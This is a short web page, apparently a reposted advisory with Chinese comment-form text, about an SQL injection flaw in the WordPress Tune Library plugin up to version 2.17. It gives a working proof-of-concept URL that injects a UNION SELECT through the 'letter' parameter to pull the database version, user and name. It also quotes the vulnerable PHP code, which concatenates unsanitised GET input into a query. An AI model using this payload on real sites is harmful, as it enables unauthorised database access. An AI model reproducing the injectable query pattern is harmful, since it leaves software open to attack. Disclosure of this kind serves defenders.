WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability

发表评论 (0) 查看评论


PoC

http://www.site.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1′ UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2–%20

—————
Vulnerable code
—————
$artistletter = $_GET[‘letter’];

if ($options[‘oneletter’] == false || $showallartists == true)

else
{
    if ($artistletter == ‘#’)
    …
    else
    {
        $querystr ="SELECT distinct artist, ‘artist’ as source FROM " . $wpdb->prefix . "tracks where artist != ” and artist like ‘" .$artistletter . "%’ order by artist";
    }
}

发表评论?

0 条评论。

发表评论